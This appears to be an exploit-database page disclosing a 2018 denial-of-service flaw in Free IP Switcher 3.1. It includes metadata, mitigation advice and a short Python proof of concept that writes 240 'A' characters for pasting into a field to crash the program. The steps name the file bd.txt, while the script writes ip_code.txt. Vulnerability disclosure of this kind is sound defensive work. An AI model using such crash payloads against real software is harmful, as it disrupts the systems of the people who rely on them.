Free IP Switcher 3.1 - Denial of Service (PoC)

vendor:

Free IP Switcher

by:

Victor Mondragón

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Free IP Switcher

Affected Version From: 3.1

Affected Version To: 3.1

Patch Exists: NO

Related CWE:

CPE: eusing:free_ip_switcher:3.1

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1

2018

Free IP Switcher 3.1 – Denial of Service (PoC)

The Free IP Switcher version 3.1 is vulnerable to a denial of service (DoS) attack. By sending a specially crafted payload, an attacker can cause the application to crash, resulting in a denial of service condition. This proof of concept (PoC) exploit triggers the crash by opening the Free IP Switcher application and performing specific actions, including pasting malicious content from a clipboard.

Mitigation:

There is currently no known patch or mitigation for this vulnerability. It is recommended to refrain from using the Free IP Switcher version 3.1 or to use alternative software until a patch is available.

Source

Exploit-DB raw data:

#Exploit Title: Free IP Switcher 3.1 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-14
#Vendor Homepage: http://www.eusing.com/index.html
#Software Link: http://www.eusing.com/ipscan/free_ip_scanner.htm
#Tested Version: 3.1 
#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: Free_IP_Switcher_3.1.py
#2.- Open bd.txt and copy content to clipboard
#2.- Open Free IP Switcher 
#3.- Select "Network Adapter"
#4.- In "Additional" enable "Computer Name" and Paste ClipBoard
#5.- Click on "Activate"
#6.- Crashed

cod = "\x41" * 240

f = open('ip_code.txt', 'w')
f.write(cod)
f.close()